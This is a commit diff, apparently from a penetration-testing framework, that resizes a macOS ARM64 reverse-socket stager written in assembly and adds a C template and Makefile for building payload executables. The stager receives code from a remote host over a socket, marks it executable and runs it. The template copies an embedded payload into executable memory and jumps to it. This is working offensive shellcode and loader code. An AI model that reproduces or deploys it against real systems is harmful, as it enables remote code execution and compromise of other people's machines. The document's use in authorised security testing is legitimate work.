Update OSX AARCH64 Stager

This fixes an issue with the stager size in the osx aarch64 payloads. It
also adds the source and Makefile for template_aarch64_darwin.bin

external/source/shellcode/osx/aarch64/stager_sock_reverse.s

@@ -20,9 +20,9 @@
 
 .global _main
 _main:
-  /* mmap(addr=0, length=0x1000, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */
+  /* mmap(addr=0, length=328, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */
   mov x0, xzr
-  mov x1, #0x1000
+  mov x1, #328
   mov x2, #2
   mov x3, #0x1002
   mvn x4, xzr
@@ -59,10 +59,10 @@ socket:
   svc 0
   //cbnz w0, retry
 
-  /* recvfrom(sockfd='x13', address='x12', length=0x1000, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
+  /* recvfrom(sockfd='x13', address='x12', length=328, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */
   mov x0, x13
   mov x1, x12
-  mov x2, #0x1000
+  mov x2, #328
   mov x3, #0x40
   mov x4, xzr
   mov x5, xzr 
@@ -70,9 +70,9 @@ socket:
   svc 0
   //cbnz w0, retry
 
-  /* mprotect(addr, length=0x1000, prot=0x5 (PROT_READ | PROT_EXEC)) */
+  /* mprotect(addr, length=328, prot=0x5 (PROT_READ | PROT_EXEC)) */
   mov x0, x12
-  mov x1, #0x1000
+  mov x1, #328
   mov x2, #5
   ldr x16, =SYS_MPROTECT
   svc 0

external/source/shellcode/osx/template/Makefile

@@ -0,0 +1,4 @@
+.PHONY: templates
+templates: template_aarch64_darwin
+	strip $^
+	cp $^ ../../../../../data/$@/$^.bin

external/source/shellcode/osx/template/template_aarch64_darwin.c

@@ -0,0 +1,18 @@
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+
+char payload[8000] = "PAYLOAD:";
+int main() {
+    void *ptr = mmap(0, sizeof(payload), PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0);
+    if (ptr == MAP_FAILED) {
+        return 0;
+    }
+    memcpy(ptr, payload, sizeof(payload));
+    mprotect(ptr, sizeof(payload), PROT_READ | PROT_EXEC);
+    int (*sc)() = ptr;
+    sc();
+    return 0;
+}